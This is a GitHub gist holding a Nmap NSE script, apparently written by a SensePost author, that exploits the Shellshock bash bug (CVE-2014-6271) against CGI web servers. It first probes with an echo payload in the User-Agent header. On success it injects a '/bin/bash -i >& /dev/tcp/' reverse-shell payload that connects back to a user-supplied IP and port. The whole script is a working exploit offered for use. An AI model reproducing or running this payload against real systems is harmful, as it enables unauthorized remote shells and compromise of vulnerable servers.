Created
October 6, 2014 09:15
-
-
Save sh1n0b1/d2f2dd8baf25bc11479d to your computer and use it in GitHub Desktop.
NSE script for Shellshock vulnerability, CVE-2014-6271
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local http = require "http" | |
| local shortport = require "shortport" | |
| local stdnse = require "stdnse" | |
| local vulns = require "vulns" | |
| description = [[ | |
| NSE script that delivers you a reverse shell using CVE-2014-6271. | |
| Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse | |
| --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status | |
| <ip> -d | |
| Credits to Stephane Chazelas for finding the vulnerability | |
| References: | |
| * http://www.openwall.com/lists/oss-security/2014/09/24/10 | |
| * http://seclists.org/oss-sec/2014/q3/685 | |
| ]] | |
| ----------------------------------------------------------------------- | |
| -- PORT STATE SERVICE REASON | |
| -- 80/tcp open http syn-ack | |
| -- | http-vuln-cve-2014-6271: | |
| -- | VULNERABLE: | |
| -- | Shellshock vulnerability, CVE-2014-6271 | |
| -- | State: VULNERABLE (Exploitable) | |
| -- | IDs: OSVDB: CVE:CVE-2014-6271 | |
| -- | Description: | |
| -- | CVE-2014-6271, Shellshock, bugbash vulnerability | |
| -- | Disclosure date: 2014-09-24 | |
| -- | References: | |
| -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 | |
| -- | http://www.openwall.com/lists/oss-security/2014/09/24/10 | |
| -- |_ http://seclists.org/oss-sec/2014/q3/685 | |
| -- | |
| ------------------------------------------------------------------------ | |
| author = "Paul Amar <paul@sensepost.com>" | |
| license = "Same as Nmap--See http://nmap.org/book/man-legal.html" | |
| categories = {"exploit","vuln","intrusive"} | |
| portrule = shortport.portnumber({80, 443}) | |
| action = function(host, port) | |
| local vuln = { | |
| title = 'Shellshock vulnerability, CVE-2014-6271', | |
| state = vulns.STATE.NOT_VULN, -- default | |
| IDS = {CVE = 'CVE-2014-6271', OSVDB = ''}, | |
| description = [[CVE-2014-6271, Shellshock, bugbash vulnerability]], | |
| references = { | |
| 'http://www.openwall.com/lists/oss-security/2014/09/24/10', | |
| 'http://seclists.org/oss-sec/2014/q3/685', | |
| }, | |
| dates = { | |
| disclosure = {year = '2014', month = '09', day = '24'}, | |
| }, | |
| } | |
| local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) | |
| local remoteIp = stdnse.get_script_args(SCRIPT_NAME..".remoteIp") or '' | |
| local remotePort = stdnse.get_script_args(SCRIPT_NAME..".remotePort") or '' | |
| local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '' | |
| local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) | |
| -- options for the headers | |
| local options = {header={}} | |
| options['header']['User-Agent'] = '() { :;}; echo; echo "NSERocks"' | |
| options['no_cache'] = true | |
| stdnse.print_debug(1, 'Sending '..options['header']['User-Agent']) | |
| detection_phase = http.get(host, port, uri, options) | |
| if detection_phase.status == 200 and string.match(detection_phase.body, 'NSERocks') ~= nil then | |
| stdnse.print_debug(1, 'Host seems vulnerable!') | |
| vuln.state = vulns.STATE.EXPLOIT | |
| -- sending reverse shell payload | |
| options = {header={}} | |
| options['header']['User-Agent'] = '() { :;}; /bin/bash -i >& /dev/tcp/'..remoteIp..'/'..remotePort..' 0>&1' | |
| options['no_cache'] = true | |
| stdnse.print_debug(1, 'Sending '..options['header']['User-Agent']) | |
| local payload_phase = http.get(host, port, uri, options) | |
| stdnse.print_debug(1, "Payload sent, you should have the reverse shell at "..remoteIp..":"..remotePort) | |
| return vuln_report:make_output(vuln) | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment